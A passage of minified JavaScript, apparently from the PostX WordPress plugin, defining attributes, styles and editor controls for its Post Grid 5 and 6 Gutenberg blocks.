}"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaDate"]'},showSmallCat:{type:"boolean",default:!1},excerptShow:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},columnFlip:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},headingShow:{type:"boolean",default:!0},headingText:{type:"string",default:"Post Grid #5"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advFilter","heading","pagiBlockCompatibility","advanceAttr","video","pagination","meta","category","readMore","query"],["paginationText","loadMoreText","paginationAjax","pagiMargin","queryNumPosts"],[{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:"emptyspace"},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"catBgHoverColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"catColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catLineColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreBgColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Secondary_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},31693:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(69234),r=l(68158),s=l(89122);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-5/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-5.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid5.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-5")]},edit:n.Z,save:()=>null})},63230:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(71766);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useState:_,useRef:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=C(null),[l,B]=_(f.Ti),{setAttributes:U,name:M,attributes:A,clientId:H,isSelected:N,className:j,context:Z,attributes:{blockId:O,excerptLimit:R,metaStyle:D,metaShow:z,showSmallMeta:F,catShow:W,showImage:V,metaSeparator:G,titleShow:q,catStyle:$,catPosition:K,titlePosition:J,excerptShow:Y,imgAnimation:X,imgOverlayType:Q,imgOverlay:ee,metaList:te,metaListSmall:le,showSmallCat:oe,readMore:ae,readMoreText:ie,readMoreIcon:ne,overlayContentPosition:re,showSmallBtn:se,showSmallExcerpt:pe,metaPosition:ce,showFullExcerpt:ue,layout:de,columnFlip:me,titleAnimation:ge,customCatColor:ye,onlyCatColor:be,contentTag:ve,titleTag:he,showSeoMeta:fe,titleLength:ke,metaMinText:we,metaAuthorPrefix:xe,titleStyle:Te,metaDateFormat:_e,authorLink:Ce,imgCrop:Ee,imgCropSmall:Se,fallbackEnable:Pe,vidIconEnable:Le,notFoundMessage:Ie,dcEnabled:Be,dcFields:Ue,previewImg:Me,advanceId:Ae,paginationShow:He,headingShow:Ne,filterShow:je,paginationType:Ze,navPosition:Oe,querySticky:Re,V4_1_0_CompCheck:{runComp:De},currentPostId:ze}}=e;function Fe(e){B({...l,selectedDC:e})}function We(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ve(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e)}function Ge(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function qe(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(A)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),qe()}),[]),T((()=>{const t=H.substr(0,6),l=L(I(H));(0,a.qi)(U,l,ze,H),(0,y.h)(e),O?O&&O!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||U({blockId:t})):(U({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&U({queryType:"archiveBuilder"}))}),[H]),T((()=>{const e=t.current;(0,b.o6)()&&0===A.dcFields.length&&U({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,A)&&(qe(),t.current=A),e.isSelected!==N&&N&&(0,f.gT)(Ve,Ge)):t.current=A}),[A]),T((()=>{Re&&U({queryNumber:"5"})}),[Re]);const $e={setAttributes:U,name:M,attributes:A,setSection:Ve,section:l.section,clientId:H,context:Z,setSelectedDc:Fe,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Fe(e),Ge("dc_group")}};let Ke;if(O&&(Ke=(0,m.Kh)(A,"ultimate-post/post-grid-6",O,(0,a.k0)())),Me)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Me});const Je=x({...Ae&&{id:Ae},className:`ultp-block-${O} ${j}`,onClick:e=>{e.stopPropagation(),Ve("general"),Ge("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:$e,selected:l.toolbarSettings}),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-6",key:"layout",options:[{img:"assets/img/layouts/pg6/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg6/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[De?"exclude":"dep"]:a.N2,pro:["metaShow","catShow"]}],store:$e}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:$e})),(0,o.createElement)("div",Je,Ke&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Ke}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ne||je||He)&&(0,o.createElement)(r.m,{attributes:A,setAttributes:U,onClick:()=>{Ve("heading"),Ge("heading")},setSection:Ve,setToolbarSettings:Ge}),function(){const e=`${ve}`,t=(e,t)=>(0,b.o6)()&&Be&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ue,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ge(t)},selectedDC:l.selectedDC,setSelectedDc:Fe,setAttributes:U,dcFields:Ue});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading...","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${de} ultp-block-content-${me}`},l.postsList.map(((l,a)=>{const r=0==a?JSON.parse(te.replaceAll("u0022",'"')):JSON.parse(le.replaceAll("u0022",'"')),c=0==a?Ee:Se;return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ultp-block-item-${a} ${ge?"ultp-animation-"+ge:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.MV,{imgOverlay:ee,imgOverlayType:Q,imgAnimation:X,post:l,fallbackEnable:Pe,vidIconEnable:Le,catPosition:K,showImage:V,idx:a,showSmallCat:oe,imgSize:c,Category:0!=a&&!oe||"aboveTitle"==K?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:W,catStyle:$,catPosition:K,customCatColor:ye,onlyCatColor:be,onClick:e=>{Ve("taxonomy-/-category"),Ge("cat")}})),onClick:()=>{Ve("image"),Ge("image")}}),Le&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{Ve("video"),Ge("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${re}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==K&&(0==a||oe)&&(0,o.createElement)(i.Z,{post:l,catShow:W,catStyle:$,catPosition:K,customCatColor:ye,onlyCatColor:be,onClick:e=>{Ve("taxonomy-/-category"),Ge("cat")}}),t(6,l.ID),l.title&&q&&1==J&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{Ve("title"),Ge("title")}}),t(5,l.ID),(0==a||F)&&z&&"top"==ce&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:G,metaStyle:D,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{Ve("meta"),Ge("meta")}}),t(4,l.ID),l.title&&q&&0==J&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{Ve("title"),Ge("title")}}),t(3,l.ID),(0==a||pe)&&Y&&(0,o.createElement)("div",{className:"ultp-block-excerpt"},(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:R,showFullExcerpt:ue,showSeoMeta:fe,onClick:e=>{Ve("excerpt"),Ge("excerpt")}})),t(2,l.ID),(0==a||se)&&ae&&(0,o.createElement)(u.Z,{readMoreText:ie,readMoreIcon:ne,titleLabel:l.title,onClick:()=>{Ve("read-more"),Ge("read-more")}}),t(1,l.ID),(0==a||F)&&z&&"bottom"==ce&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:G,metaStyle:D,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{Ve("meta"),Ge("meta")}}),t(0,l.ID),(0,b.o6)()&&Be&&(0,o.createElement)(v.Z,{dcFields:Ue,setAttributes:U,startOnboarding:We,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ie})}(),He&&"navigation"==Ze&&"topRight"!=Oe&&(0,o.createElement)(c.Z,{onClick:()=>{Ve("pagination"),Ge("pagination")}}))))}},71766:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8;function b({store:e}){const{queryType:t,titleAnimationArg:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:u}}=e.attributes,{context:d,section:y,settingTab:b,setSettingTab:v}=e;return g((()=>{(0,m.CH)(d,n,e,r)}),[n,r,e.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6834",store:e}),(0,o.createElement)(p.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,exclude:["queryNumber","queryNumPosts"],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:6,label:__("Number of Post","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:e,initialOpen:y.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","columnGridGap","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-6",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg6/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg6/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:4,data:{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:y.meta,exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:{...a.WJ,tab:"settings"}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:e,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:e}),(0,o.createElement)(a.fm,{store:e,include:l}),!u&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{depend:"headingShow",store:e,isTab:!0,initialOpen:y.heading}),"posts"!=t&&"customPosts"!=t&&(0,o.createElement)(a.B0,{pro:!0,isTab:!0,store:e,initialOpen:y.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{pro:!0,isTab:!0,initialOpen:y.pagination,depend:"paginationShow",store:e,include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","pagiMargin","navPosition"]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:s,catPosition:p,titlePosition:c,excerptShow:m,readMore:g,metaPosition:y,catShow:b}=t.attributes,v=[i&&"bottom"==y,g,m,s&&0==c,i&&"top"==y,s&&1==c,b&&"aboveTitle"==p];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:v});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"],exStyle:["pagiMargin","pagiPadding","navMargin"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleTypo","titleColor","titleHoverColor","titleBackground"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item 